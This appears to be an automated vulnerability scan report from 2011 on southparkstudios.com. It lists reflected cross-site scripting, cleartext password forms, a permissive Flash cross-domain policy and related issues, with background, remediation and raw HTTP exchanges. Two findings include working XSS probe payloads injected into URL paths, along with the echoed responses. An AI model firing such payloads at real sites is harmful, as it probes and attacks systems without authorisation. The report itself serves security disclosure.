XSS, DORK, southparkstudios.com, Cross Site Scripting, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Tue Apr 19 14:54:03 CDT 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog
Loading

1. Cross-site scripting (reflected)

1.1. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight [REST URL parameter 1]

1.2. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight [REST URL parameter 2]

2. Cleartext submission of password

2.1. http://www.southparkstudios.com/

2.2. http://www.southparkstudios.com/account/login

2.3. http://www.southparkstudios.com/account/login

2.4. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight

3. Flash cross-domain policy

4. Password field with autocomplete enabled

4.1. http://www.southparkstudios.com/

4.2. http://www.southparkstudios.com/account/login

4.3. http://www.southparkstudios.com/account/login

4.4. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight

5. Cookie scoped to parent domain

6. Cross-domain script include

6.1. http://www.southparkstudios.com/

6.2. http://www.southparkstudios.com/account/login

6.3. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight

7. Email addresses disclosed

7.1. http://www.southparkstudios.com/

7.2. http://www.southparkstudios.com/account/login

7.3. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight

7.4. http://www.southparkstudios.com/layout/common/js/widgets/twitter.js

8. Private IP addresses disclosed

8.1. http://www.southparkstudios.com/

8.2. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight

9. Robots.txt file

10. HTML does not specify charset

10.1. http://www.southparkstudios.com/layout/skin_v3/css/img/cmn/tabs_bg.gif

10.2. http://www.southparkstudios.com/layout/skin_v3jq/css/img/upload/upload_logo_big.jpg

11. Content type incorrectly stated

11.1. http://www.southparkstudios.com/layout/skin_v3/css/img/cmn/tabs_bg.gif

11.2. http://www.southparkstudios.com/layout/skin_v3jq/css/img/upload/upload_logo_big.jpg



1. Cross-site scripting (reflected)  next
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /clips/360434/god-bless-you-captain-hindsight

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15540"><script>alert(1)</script>f37e55f8e40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /clips15540"><script>alert(1)</script>f37e55f8e40/360434/god-bless-you-captain-hindsight HTTP/1.1
Host: www.southparkstudios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Type: text/html;charset=utf-8
Content-Length: 9219
Expires: Tue, 19 Apr 2011 19:46:54 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 19:46:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<script src="http://repo.comedycentral.com/feeds/init/southparkstudios.com?url=/clips15540"><script>alert(1)</script>f37e55f8e40/360434/god-bless-you-captain-hindsight&cmsPageId=" type="text/javascript">
...[SNIP]...

1.2. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /clips/360434/god-bless-you-captain-hindsight

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22f9a"><script>alert(1)</script>3282301e834 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /clips/36043422f9a"><script>alert(1)</script>3282301e834/god-bless-you-captain-hindsight HTTP/1.1
Host: www.southparkstudios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Type: text/html;charset=utf-8
Content-Length: 9287
Expires: Tue, 19 Apr 2011 19:47:20 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 19:47:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<script src="http://repo.comedycentral.com/feeds/init/southparkstudios.com?url=/clips/36043422f9a"><script>alert(1)</script>3282301e834/god-bless-you-captain-hindsight&cmsPageId=" type="text/javascript">
...[SNIP]...

2. Cleartext submission of password  previous  next
There are 4 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


2.1. http://www.southparkstudios.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/clips/36043422f9a%22%3E%3Cscript%3Ealert(1)%3C/script%3E3282301e834/god-bless-you-captain-hindsight
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242714|session#1303242631302-17636#1303244514; s_nr=1303242653801; s_cc=true; s_sq=viacomedycentral%2Cviasouthparkstudios%3D%2526pid%253Dshows%25252Fsouthparkstudios%25252Fclips%25252F36043422f9a%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.southparkstudios.com%25252F%2526ot%253DA

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Content-Length: 26479
Content-Type: text/html;charset=utf-8
X-Powered-By: PHP/5.3.2
Vary: User-Agent
Expires: Tue, 19 Apr 2011 19:50:21 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 19:50:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
</a>
        <form action="/account/login" method="post">
            <fieldset>
...[SNIP]...
<input type="text" id="login_username" name="username" value="User Name" />
               <input type="password" id="login_password" name="password" value="Password" />
               <br />
...[SNIP]...

2.2. http://www.southparkstudios.com/account/login  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /account/login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /account/login HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/guide/episodes/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242727|session#1303242631302-17636#1303244527; s_nr=1303242666203; s_cc=true; s_sq=viacomedycentral%2Cviasouthparkstudios%3D%2526pid%253Dshows%25252Fsouthparkstudios%25252Fguide%25252Fepisodes%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.southparkstudios.com%25252Faccount%25252Flogin%2526ot%253DA

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Content-Length: 10656
Content-Type: text/html;charset=utf-8
Set-Cookie: southpark_u=1; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
Set-Cookie: southpark_username=Anonymous; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
Set-Cookie: southpark_sid=41f01e7fe980fe7d2080d03a09a629e0; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
Set-Cookie: southpark_k=; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
X-Powered-By: PHP/5.3.2
Expires: Tue, 19 Apr 2011 19:50:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 19 Apr 2011 19:50:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<div id="loginbox">
           <form method="POST" action="/account/login/">
               <label for="username" class="username">
...[SNIP]...
</label>
               <input type="password" name="password" />


               <input type="hidden" name="redirect" value="" />
...[SNIP]...

2.3. http://www.southparkstudios.com/account/login  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /account/login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /account/login HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/guide/episodes/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242727|session#1303242631302-17636#1303244527; s_nr=1303242666203; s_cc=true; s_sq=viacomedycentral%2Cviasouthparkstudios%3D%2526pid%253Dshows%25252Fsouthparkstudios%25252Fguide%25252Fepisodes%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.southparkstudios.com%25252Faccount%25252Flogin%2526ot%253DA

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Content-Length: 10656
Content-Type: text/html;charset=utf-8
Set-Cookie: southpark_u=1; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
Set-Cookie: southpark_username=Anonymous; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
Set-Cookie: southpark_sid=41f01e7fe980fe7d2080d03a09a629e0; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
Set-Cookie: southpark_k=; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
X-Powered-By: PHP/5.3.2
Expires: Tue, 19 Apr 2011 19:50:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 19 Apr 2011 19:50:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
</a>
        <form action="/account/login" method="post">
            <fieldset>
...[SNIP]...
<input type="text" id="login_username" name="username" value="User Name" />
               <input type="password" id="login_password" name="password" value="Password" />
               <br />
...[SNIP]...

2.4. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /clips/360434/god-bless-you-captain-hindsight

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /clips/360434/god-bless-you-captain-hindsight HTTP/1.1
Host: www.southparkstudios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Content-Length: 136520
Content-Type: text/html;charset=utf-8
Set-Cookie: ak-mobile-detected=no; expires=Wed, 20-Apr-2011 01:46:11 GMT; path=/
Set-Cookie: ak-mobile-detected=no; expires=Wed, 20-Apr-2011 01:46:11 GMT; path=/
X-Powered-By: PHP/5.3.2
Expires: Tue, 19 Apr 2011 19:46:15 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 19:46:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
</a>
        <form action="/account/login" method="post">
            <fieldset>
...[SNIP]...
<input type="text" id="login_username" name="username" value="User Name" />
               <input type="password" id="login_password" name="password" value="Password" />
               <br />
...[SNIP]...

3. Flash cross-domain policy  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.southparkstudios.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Length: 1036
Content-Type: application/xml
Cache-Control: max-age=600
Date: Tue, 19 Apr 2011 19:46:15 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.360i.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.google.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.googlesyndication.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.adbureau.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.tremormedia.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mtvnservices.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="media.mtvnservices-d.mtvi.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="media.mtvnservices-q.mtvi.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mtvi.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.schematic.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.southparkstudios.com" secure="true"/>
...[SNIP]...

4. Password field with autocomplete enabled  previous  next
There are 4 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


4.1. http://www.southparkstudios.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/clips/36043422f9a%22%3E%3Cscript%3Ealert(1)%3C/script%3E3282301e834/god-bless-you-captain-hindsight
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242714|session#1303242631302-17636#1303244514; s_nr=1303242653801; s_cc=true; s_sq=viacomedycentral%2Cviasouthparkstudios%3D%2526pid%253Dshows%25252Fsouthparkstudios%25252Fclips%25252F36043422f9a%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.southparkstudios.com%25252F%2526ot%253DA

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Content-Length: 26479
Content-Type: text/html;charset=utf-8
X-Powered-By: PHP/5.3.2
Vary: User-Agent
Expires: Tue, 19 Apr 2011 19:50:21 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 19:50:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
</a>
        <form action="/account/login" method="post">
            <fieldset>
...[SNIP]...
<input type="text" id="login_username" name="username" value="User Name" />
               <input type="password" id="login_password" name="password" value="Password" />
               <br />
...[SNIP]...

4.2. http://www.southparkstudios.com/account/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /account/login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /account/login HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/guide/episodes/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242727|session#1303242631302-17636#1303244527; s_nr=1303242666203; s_cc=true; s_sq=viacomedycentral%2Cviasouthparkstudios%3D%2526pid%253Dshows%25252Fsouthparkstudios%25252Fguide%25252Fepisodes%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.southparkstudios.com%25252Faccount%25252Flogin%2526ot%253DA

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Content-Length: 10656
Content-Type: text/html;charset=utf-8
Set-Cookie: southpark_u=1; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
Set-Cookie: southpark_username=Anonymous; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
Set-Cookie: southpark_sid=41f01e7fe980fe7d2080d03a09a629e0; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
Set-Cookie: southpark_k=; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
X-Powered-By: PHP/5.3.2
Expires: Tue, 19 Apr 2011 19:50:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 19 Apr 2011 19:50:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<div id="loginbox">
           <form method="POST" action="/account/login/">
               <label for="username" class="username">
...[SNIP]...
</label>
               <input type="password" name="password" />


               <input type="hidden" name="redirect" value="" />
...[SNIP]...

4.3. http://www.southparkstudios.com/account/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /account/login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /account/login HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/guide/episodes/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242727|session#1303242631302-17636#1303244527; s_nr=1303242666203; s_cc=true; s_sq=viacomedycentral%2Cviasouthparkstudios%3D%2526pid%253Dshows%25252Fsouthparkstudios%25252Fguide%25252Fepisodes%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.southparkstudios.com%25252Faccount%25252Flogin%2526ot%253DA

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Content-Length: 10656
Content-Type: text/html;charset=utf-8
Set-Cookie: southpark_u=1; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
Set-Cookie: southpark_username=Anonymous; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
Set-Cookie: southpark_sid=41f01e7fe980fe7d2080d03a09a629e0; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
Set-Cookie: southpark_k=; expires=Wed, 18-Apr-2012 19:50:26 GMT; path=/; domain=.southparkstudios.com; HttpOnly
X-Powered-By: PHP/5.3.2
Expires: Tue, 19 Apr 2011 19:50:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 19 Apr 2011 19:50:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
</a>
        <form action="/account/login" method="post">
            <fieldset>
...[SNIP]...
<input type="text" id="login_username" name="username" value="User Name" />
               <input type="password" id="login_password" name="password" value="Password" />
               <br />
...[SNIP]...

4.4. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /clips/360434/god-bless-you-captain-hindsight

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /clips/360434/god-bless-you-captain-hindsight HTTP/1.1
Host: www.southparkstudios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Content-Length: 136520
Content-Type: text/html;charset=utf-8
Set-Cookie: ak-mobile-detected=no; expires=Wed, 20-Apr-2011 01:46:11 GMT; path=/
Set-Cookie: ak-mobile-detected=no; expires=Wed, 20-Apr-2011 01:46:11 GMT; path=/
X-Powered-By: PHP/5.3.2
Expires: Tue, 19 Apr 2011 19:46:15 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 19 Apr 2011 19:46:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
</a>
        <form action="/account/login" method="post">
            <fieldset>
...[SNIP]...
<input type="text" id="login_username" name="username" value="User Name" />
               <input type="password" id="login_password" name="password" value="Password" />
               <br />
...[SNIP]...

5. Cookie scoped to parent domain  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.southparkstudios.com
Path:   /account/login

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

